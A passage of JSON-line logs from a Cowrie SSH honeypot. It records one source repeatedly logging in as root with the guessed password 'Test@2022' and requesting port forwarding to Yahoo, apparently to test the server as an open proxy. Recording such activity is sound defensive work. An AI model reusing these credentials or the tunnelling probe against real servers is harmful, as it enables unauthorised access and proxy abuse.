],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:01.887601Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.170995Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":17021,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:17021","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.229304Z","session":"4cbf0b60cf22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.286159Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":10199,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:10199","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.443206Z","session":"4cbf0b60cf22"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.500030Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.558490Z","src_ip":"213.209.150.239","session":"4cbf0b60cf22"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21128,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e434ba19840","protocol":"ssh","message":"New connection: 213.209.150.239:21128 (1.2.3.4:22) [session: 9e434ba19840]","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.614436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.615138Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.672048Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:02.954654Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":15442,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:15442","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.012554Z","session":"9e434ba19840"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.069436Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12280,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12280","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.227051Z","session":"9e434ba19840"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.283760Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.341400Z","src_ip":"213.209.150.239","session":"9e434ba19840"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21190,"dst_ip":"1.2.3.4","dst_port":22,"session":"93485e01c4ce","protocol":"ssh","message":"New connection: 213.209.150.239:21190 (1.2.3.4:22) [session: 93485e01c4ce]","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.387541Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.388453Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.435522Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.670824Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":3934,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:3934","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.718977Z","session":"93485e01c4ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.766251Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":10642,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10642","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.901413Z","session":"93485e01c4ce"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.948559Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:03.997282Z","src_ip":"213.209.150.239","session":"93485e01c4ce"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21233,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa1f7df94110","protocol":"ssh","message":"New connection: 213.209.150.239:21233 (1.2.3.4:22) [session: aa1f7df94110]","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.052951Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.054181Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.111339Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.395816Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":12944,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:12944","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.453685Z","session":"aa1f7df94110"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.510468Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":28215,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:28215","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.667117Z","session":"aa1f7df94110"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.724274Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.781933Z","src_ip":"213.209.150.239","session":"aa1f7df94110"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21295,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6fbfa958703","protocol":"ssh","message":"New connection: 213.209.150.239:21295 (1.2.3.4:22) [session: a6fbfa958703]","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.837477Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.838214Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:04.895016Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.177898Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":20502,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20502","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.235569Z","session":"a6fbfa958703"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.292397Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":7827,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:7827","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.447185Z","session":"a6fbfa958703"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.503856Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.562086Z","src_ip":"213.209.150.239","session":"a6fbfa958703"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":21346,"dst_ip":"1.2.3.4","dst_port":22,"session":"db2246796f8a","protocol":"ssh","message":"New connection: 213.209.150.239:21346 (1.2.3.4:22) [session: db2246796f8a]","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.617399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.618443Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.675027Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:02:05.957242Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":23596,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:23596","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.014796Z","session":"db2246796f8a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.071515Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":4071,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:4071","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.227010Z","session":"db2246796f8a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:02:06.284465Z","src_ip":"213.209.150.239","session":"db2246796f8a"}
